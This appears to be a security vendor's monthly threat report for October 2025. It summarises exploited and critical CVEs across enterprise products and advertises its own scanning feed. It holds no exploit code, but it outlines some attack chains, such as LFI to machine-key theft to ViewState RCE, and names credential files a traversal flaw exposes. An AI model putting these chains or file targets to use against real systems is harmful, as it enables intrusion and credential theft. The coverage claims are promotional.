October 2025 Threat Report

Just over 4,100 new CVEs emerged in October 2025, representing new attack surfaces and placing pressure on defenders to identify and patch. For operational resilience, organizations need to scan their IT infrastructure often and prioritize mitigation efforts.

A free trial of Greenbone’s OPENVAS BASIC lets defenders scan their enterprise IT estate and stay on top of emerging threats. The trial includes access to Greenbone’s OPENVAS ENTERPRISE FEED, delivering industry-leading coverage for CVEs and other IT security vulnerabilities. This month’s threat report will cover some of the most critical new vulnerabilities being actively exploited, and emerging high-risk CVEs with widespread exposure.

Oracle EBS Exploited in Two Separate Ransomware Campaigns

CVE-2025-61882 (CVSS 9.8, EPSS ~99th pctl) is an unauthenticated remote code execution (RCE) flaw in Oracle E-Business Suite (EBS), actively exploited since at least August 9, 2025 [1][2]. The CVE is being used in mass exploitation campaigns for data-theft and extortion by the Cl0p ransomware [S0611] operator. Public PoC exploits appeared in early October and a detailed technical analysis is available.

Besides CVE-2025-61882, CVE-2025-61884 (CVSS 7.5, EPSS ~93rd pctl), a Server-Side Request Forgery (SSRF) flaw [CWE-918], also in Oracle EBS, was actively exploited in October 2025. CVE-2025-61884 was added to CISA KEV and has been used to deploy ransomware [T1486]. Attacks leveraging CVE-2025-61882 reportedly used data theft for extortion. However, attacks exploiting CVE-2025-61884 have used file encryption for ransom impact.

Both CVEs received alerts from numerous national CERT entities globally [3][4][5][6][7][8][9][10]. Greenbone’s OPENVAS ENTERPRISE FEED includes an active check and remote version check for CVE-2025-61882, and a remote version check for CVE-2025-61884 allowing defenders to identify vulnerable assets. According to Oracle’s official advisories [11][12], versions 12.2.3 to 12.2.14 of EBS are affected.

Smartbedded Meteobridge Now Actively Exploited Via CVE-2025-4008

CVE-2025-4008 (CVSS 8.8, ~97th pctl), published on May 13, 2025, is a remote unauthenticated command injection vulnerability [CWE-77] in Smartbedded Meteobridge, now actively exploited. The flaw resides in the template.cgi script of the Meteobridge web interface, which insecurely implements eval() calls. Exploitation allows attackers to execute arbitrary commands with root privileges on affected devices. Smartbedded Meteobridge is a gateway that connects personal weather stations to public networks. Shodan reveals roughly 70–130 devices exposed on the public internet.

A proof-of-concept (PoC) exploit and full technical write-up were published by ONEKEY, which discovered the flaw during firmware analysis. While the vendor’s official advisory claims that Internet exposure is a “precondition for exploiting any security vulnerability”, insider attacks can also present high risk to organizations. Greenbone is able to detect vulnerable instances of Smartbedded Meteobridge with an active check and remote version check. Users should upgrade to version 6.2 or later.

RediShell: A 13-Year-Old Lua Flaw Allows RCE in Redis

CVE-2025-49844 (CVSS 9.9, EPSS ~90th pctl) allows authenticated RCE on all unpatched Redis instances with Lua scripting enabled. The flaw, nicknamed RediShell, is caused by a use-after-free vulnerability [CWE-416] in the Lua garbage collector. Lua scripting is enabled by default, often with authentication disabled, increasing the risk of weak configuration.

Redis is prevalent in cloud environments and has been a hot target for cryptomining [T1496] and ransomware [T1486] leveraging P2PInfect, Redigo, HeadCrab, and Migo malware. A PoC exploit for CVE-2025-49844 confirms exploitability, along with two additional Lua engine flaws:

• CVE-2025-46817 (CVSS 9.8, EPSS ~96th pctl): an Integer Overflow [CWE-190] in the unpack()
• CVE-2025-46818 (CVSS 7.3, EPSS ~88th pctl): a code injection flaw [CWE-94] that allows an attacker to execute Lua scripts with the context of another user.

Multiple national security alerts have been issued for the CVEs [1][2][3][4][5][6]. OPENVAS ENTERPRISE FEED includes authenticated security checks to identify exposure across many Linux environments. Redis has issued a patch and additional mitigations can be found in the vendor’s official advisory.

Emergency Out-of-Band Patch for Windows Server Update Service and More Microsoft Risks Emerge

Microsoft’s October security update disclosed a total of 201 new CVEs. Two were flagged as “Exploitation Detected” and 14 as “Exploitation more likely”. In addition to these disclosures, an emergency alert was issued by CISA for CVE-2025-59287, affecting the Windows Server Update Service (WSUS). Here are brief descriptions of the most high-risk emerging threats to Microsoft products:

• CVE-2025-59287 (CVSS 9.8, EPSS ~70th pctl): A flaw in WSUS allows unauthorized RCE when untrusted data is deserialized [CWE-502]. Numerous national CERT alerts have been published, many referencing a public PoC exploit [1][2][3][4][5][6][7][8][9]. Microsoft’s official advisory also acknowledges a PoC exploit exists.
• CVE-2025-33073 (CVSS 8.8, EPSS ~97th pctl): A Windows SMB vulnerability allows an authorized attacker to remotely achieve privilege escalation [CWE-284] to SYSTEM level. The flaw was added to CISA KEV.
• CVE-2025-59230 (CVSS 7.8, EPSS ~95 pctl): An elevation of privilege vulnerability [CWE-284] in the Windows Remote Access Connection Manager has been added to CISA KEV.
• CVE-2025-24990 (CVSS 7.8, EPSS ~91st pctl): The end-of-life (EOL) third party Agere Modem driver in Microsoft Windows is now considered actively exploited. The flaw is due to an untrusted pointer dereference [CWE-822] which can lead to arbitrary code execution.
• CVE-2025-55315 (CVSS 9.9): A security feature bypass vulnerability in NET Core can lead to HTTP request smuggling [CWE-444]. An authenticated attacker could exploit the flaw to bypass front-end security controls, hijack user sessions, perform request-forgery attacks. A technical description is available increasing the risk. See the official security advisory for affected versions and patches.
• CVE-2025-59502 (CVSS 7.5, EPSS ~81 pctl): An unauthorized attacker can remotely induce uncontrolled resource consumption [CWE-400] in Windows Remote Procedure Call (RPC) resulting in Denial of Service (DoS). Microsoft classifies the CVE as “Exploitation More Likely”.
• CVE-2025-47827 (CVSS 4.6): Secure Boot can be bypassed because the igel-flash-driver module improperly verifies a cryptographic signature [CWE-324]. The flaw allows a malicious root filesystem to be mounted from an unverified SquashFS image. Even though the vulnerability arises in IGEL OS, the attack chain has implications for Windows/UEFI systems. Microsoft has flagged this flaw as actively exploited and a technical description with PoC exploit is available.

Greenbone provides robust detection for Microsoft’s recent security updates. The OPENVAS ENTERPRISE FEED includes detection for 156 (78%) of the 201 newly disclosed CVEs affecting Microsoft products.

Defenders Still “Living On the Edge”: Constant Flow of Perimeter Device Flaws

Greenbone’s June 2024 Threat Report first began tracking high-risk vulnerabilities in perimeter network devices. Since then, edge vulnerabilities have continued to surface without abate. In this section, we will review emerging threats to devices meant to protect internal networks from attacks.

F5 Hack: Multiple New Vulnerabilities in F5 Products Disclosed

In October 2025, F5 claimed a “highly sophisticated nation-state” adversary had long-term, persistent access to internal systems, indicating dwell time of at least 12 months. The attackers stole BIG-IP source code and internal vulnerability information. The data theft prompted an urgent publication of CVEs triaged in the F5 vulnerability pipeline.

In total, 44 new CVEs were published for F5 products in October 2025, several were subject of national CERT alerts [1][2][3][4][5][6][7][8][9][10]. Active exploitation has not been reported and no PoC exploits have been published. However, F5 vulnerabilities are often used in ransomware attacks. In response, Greenbone added new security tests for F5 devices, covering 32 (73%) of the 44 new CVEs.

Fresh CVEs in Ivanti Products for Defenders to Patch

Trend Micro’s Zero Day Initiative (ZDI) publicly disclosed 14 unpatched vulnerabilities in Ivanti Endpoint Manager (EPM) after months of unsuccessful coordination with Ivanti. According to reports, Ivanti requested six months to address the flaws. ZDI’s disclosure effectively exposed these flaws as “zero-day” vulnerabilities, meaning attackers could now exploit them before patches are available.

Greenbone is able to detect all of ZDI’s newly disclosed CVEs and Ivanti CVEs disclosed by other security researchers. Greenbone’s OPENVAS ENTERPRISE FEED includes detection tests for all 17 Ivanti CVEs disclosed in October 2025.

Fortinet’s Products Exposed to 32 New CVEs in October

In total, 32 CVEs were published for Fortinet products in October 2025. However, only 17 of these are listed on the vendor’s official advisory page. Greenbone added checks for 21 of the 32 new CVEs, providing high detection coverage for defenders using Fortinet devices. Fortinet has 20 CVEs listed in CISA’s KEV catalog; 13 of these are associated with ransomware attacks indicating high risk for customers.

Critical Unauthenticated RCE in WatchGuard Fireware OS

CVE-2025-9242 (CVSS 9.3, EPSS ~90th pctl) affecting WatchGuard Fireware OS allows unauthenticated RCE. Fireware OS supports the vendor’s firewalls, VPN gateways, policy enforcement and intrusion prevention systems (IPS). Watchtowr security researchers have published a technical description and PoC exploit increasing the risk.

Several alerts have been issued from government agencies regarding CVE-2025-9242 [1][2][3]. The OPENVAS ENTERPRISE FEED includes a remote version check to identify affected appliances. Users should update to version 12.3.1_Update3, 12.5.13, 12.11.4, 2025.1.1 or later and review the vendor’s official advisory for more information.

CVE-2025-59978: Junos Space Flaw Lets Authenticated Attackers Inject Malicious Scripts

CVE-2025-59978 (CVSS 9.0) is a stored XSS flaw [CWE-79] in Juniper Networks’ Junos Space. Junos Space is a network‑management and orchestration that provides centralized management of Juniper’s routers, switches and security devices. The vulnerability lets a low-privileged authenticated attacker inject JavaScript <script> tags which execute with a viewing admin’s privileges. No active exploitation or public PoCs are yet known. Greenbone’s OPENVAS ENTERPRISE FEED includes a remote version check to identify vulnerable instances.  All Junos Space versions before 24.1R4 are affected. See the official security advisory for more information.

Local Privilege Escalation Flaw in VMware Exploited In-The-Wild

CVE-2025-41244 (CVSS 7.8), published in September 2025, is now flagged as actively exploited. Multiple sources have linked in-the-wild exploitation to UNC5174, a China-linked threat actor. The flaw is a local privilege escalation [CWE-284] when VMware Tools is managed by Aria Operations with SDMP enabled. Successful exploitation allows a local attacker to escalate privileges to root on the same VM. A technical analysis and PoC exploit are available increasing the risk.

The VMware platform has appeared on CISA KEV 26 times including this latest CVE; 8 of these entries indicate use in ransomware attacks. CERT advisories have been issued from various countries [1][2][3][4]. So far in 2025, a total of 40 CVEs have been issued across all VMware platforms. In response, Greenbone has added detection to both the OPENVAS ENTERPRISE FEED and COMMUNITY feed, covering  36 (90%) of VMware’s 2025 vulnerabilities.

To mitigate attacks, Windows users should update to VMware Tools 12.5.4 (Windows 32-bit: 12.4.9). Linux users should update to vendor-provided open-vm-tools. If you can’t patch immediately, disable SDMP and strictly limit guest access. Specific versions of VMware Aria Operations, VMware Tools, VMware Cloud Foundation, VMware Telco Cloud Platform and VMware Telco Cloud Infrastructure are affected. See the official advisory for more details.

Gladinet CentreStack Flaw Allows Machine Key Theft and RCE

CVE-2025-11371 (CVSS 9.8, EPSS 89th pctl) is an unauthenticated Local File Inclusion (LFI) flaw [CWE-552] that allows remote attackers to read arbitrary files, including the Web.config in Gladinet CentreStack and Triofox. In the wild attacks have been observed where the LFI flaw was exploited to retrieve the machine key from Web.config, then forge ASP.NET ViewState payloads. For RCE, attackers are exploiting another ViewState deserialization: CVE-2025-30406 (CVSS 9.8, EPSS ~99th pctl). A detailed technical description and attack chain analysis is publicly available.

Greenbone’s OPENVAS ENTERPRISE FEED has included detection tests for both CVEs described above since April 2025 [1][2]. CentreStack has published patches for users to prevent exploitation. According to Gladinet’s official advisory, users who can’t patch should disable the temp handler in UploadDownloadProxy’s Web.config to block the unauthenticated /storage/t.dn endpoint abused for LFI.

Zimbra Zero-Day Used to Target Brazilian Military

CVE-2025-27915 (CVSS 5.4, EPSS 97th pctl) is a stored cross-site scripting (XSS) vulnerability [CWE-79] in Zimbra Collaboration Suite (ZCS). The flaw is caused by insufficient sanitization of HTML content contained in .ICS calendar files. As a result, attackers can launch phishing attacks with malicious .ICS calendar invites [T1566.001] to execute arbitrary JavaScript within a victim’s webmail session.

The CVE has been exploited in targeted attacks against the Brazilian military and added to CISA KEV. Belgium’s CERT.be has published a security advisory. ZCS is highly targeted by threat actors; CISA KEV contains 14 CVEs; five associated with ransomware attacks [T1486]. Greenbone’s OPENVAS ENTERPRISE FEED includes remote banner check to identify vulnerable instances. The flaw affects ZCS versions 9.0, 10.0, and 10.1. Users should upgrade to the latest version and be especially cautious handling email attachments.

Critical Kentico Xperience Flaws are Actively Exploited

CVE-2025-2746 and CVE-2025-2747 (both CVSS 9.8) allow unauthenticated remote attackers to gain full administrative control of Kentico Xperience via an authentication bypass [CWE-288] flaw. Both CVEs are actively exploited. Exploitation enables attackers to manipulate or exfiltrate CMS data and deploy malicious payloads with administrative privileges.

A full technical description, and PoC exploits increase the risk of near future exploitation. Multiple national CERT advisories have been published for the new CVEs [1][2][3]. The OPENVAS ENTERPRISE FEED includes an active check for CVE-2025-2746 and an active check and remote version check for CVE-2025-2747. Versions through 13.0.172 and 13.0.178 are affected and the vendor has published hotfixes for mitigation.

New High-Severity Flaw in Zoho ManageEngine ADManager Plus

CVE-2025-10020 (CVSS 8.8, EPSS ~73rd pctl) is an authenticated command injection vulnerability [CWE-77] in the Custom Script component of ManageEngine ADManager Plus. The flaw allows attackers with low-privileged access to gain arbitrary RCE. ManageEngine is a widely used on-prem solution for system administrators, IT operations teams, and security engineers to monitor, automate, and secure IT infrastructures.

Despite no active exploitation, public technical description, or PoC exploit, ManageEngine has historically attracted attention from cyber adversaries. This makes CVE-2025-10020 high risk when combined with stolen credentials or insider attacks. The ManageEngine platform is listed on CISA KEV nine times; twice for ransomware attacks (CVE-2022-47966 and CVE-2021-40539). Updating to version 8024 is strongly recommended.

The OPENVAS ENTERPRISE FEED provides:

• A remote version check to detect servers vulnerable to CVE-2025-10020
• Detection tests for all Zoho vulnerabilities listed in CISA KEV including CVE-2022-47966 and CVE-2021-40539 used in ransomware attacks [T1486]
• Detection tests for >70% of CVEs affecting Zohocorp products from 2021 onward

Flowise Server Gives Attackers RCE and Access to Secrets

CVE-2025-61913 (CVSS 9.9) is a path traversal flaw [CWE-22] in Flowise that lets low-privileged, authenticated attackers read and write arbitrary files, potentially leading to RCE. Flowise is a drag & drop user interface and backend server for building customized large language model (LLM) applications.

CVE-2025-61913 stems from improper input validation of the file_path parameter in WriteFileTool and ReadFileTool. The flaw enables access to sensitive files such as /root/.flowise/encryption.key and /root/.flowise/database.sqlite in Docker, or /etc/passwd, /etc/shadow, and /root/.ssh/id_rsa in non-Docker setups. The vendor has published a full PoC exploit themselves, and at least one other PoC exploit exists [1]. However, in-the-wild exploitation has not been confirmed.

Several other new high-risk CVEs also impact Flowise Server:

• CVE-2025-26319 (CVSS 9.8): An unauthenticated arbitrary file upload vulnerability [CWE-22] in /api/v1/attachments. A complete technical description and PoC is available online increasing the risk.
• CVE-2025-61687 (CVSS 8.8): A file upload vulnerability [CWE-22] allows authenticated users to upload arbitrary files and persistently store malicious js web shells on the server, leading to RCE.
• CVE-2025-29192 (CVSS 6.1): Allows XSS [CWE-79] via FORM element and INPUT element when an admin views the chat log.
• CVE-2025-50538 (CVSS 6.1): Allows XSS [CWE-79] via IFRAME element when an admin views the chat log.

Germany’s BSI has issued WID-SEC alerts for all CVEs described above [2][3][4][5]. The OPENVAS ENTERPRISE FEED includes two remote version detection checks which address all aforementioned CVEs affecting Flowise [6][7][8]. Users should update to version 3.0.8 or later and disable ALLOW_BUILTIN_DEP during installation. See the vendor’s official advisory for more information.

CVE-2025-37729: Critical RCE Vulnerability in Elastic Cloud Enterprise

CVE-2025-37729 (CVSS 9.1) affecting Elastic Cloud Enterprise (ECE) allows RCE to authenticated attackers with admin privileges. Exploitation could allow exfiltration of sensitive data due to improper handling of Jinjava template expressions. The vulnerability poses a significant insider threat, particularly in hybrid and multi-cloud environments where ECE is deployed. Spain’s INCIBE CERT has issued a security alert. Greenbone’s OPENVAS ENTERPRISE FEED includes a remote banner check to identify vulnerable instances. According to the vendor’s official advisory, versions 2.5.0 through 3.8.1 and 4.0.0 through 4.0.1 are affected.

Summary

The October 2025 Threat Report only scratches the surface of new software flaws emerging in the past month—and OPENVAS SECURITY INTELLIGENCE’s ability to detect them. October 2025 saw 4,100 new CVEs and novel cyber attack campaigns leveraging both fresh vulnerabilities and already known ones. This past month, high-impact flaws drove ransomware, data-theft, and operational downtime leading to attempts at corporate extortion and lost revenue. Greenbone’s OPENVAS BASIC free trial plus the OPENVAS ENTERPRISE FEED include detection modules for many emerging and legacy CVEs, helping security teams find, triage, and fix vulnerable IT assets.